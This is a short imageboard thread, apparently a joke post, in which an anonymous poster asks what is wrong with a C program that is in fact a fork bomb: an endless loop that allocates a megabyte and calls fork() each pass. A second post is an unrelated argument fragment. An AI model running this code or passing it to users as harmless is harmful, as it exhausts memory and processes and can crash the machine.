Return Styles: Pseud0ch, Terminal, Valhalla, NES, Geocities, Blue Moon. Entire thread

Can someone tell me whats wrong with my code

Name: Anonymous 2007-12-28 21:10

#include <stdlib.h>
#include <unistd.h>
int main()
{
    while(1)
    {
       malloc(1048576);
       fork();
    }
}


TYI

Name: Anonymous 2007-12-31 22:06

>>42
Again, incorrect. I don't believe I've lost anything, I was just correcting >>39's obvious error.

Newer Posts
Don't change these.
Name: Email:
Entire Thread Thread List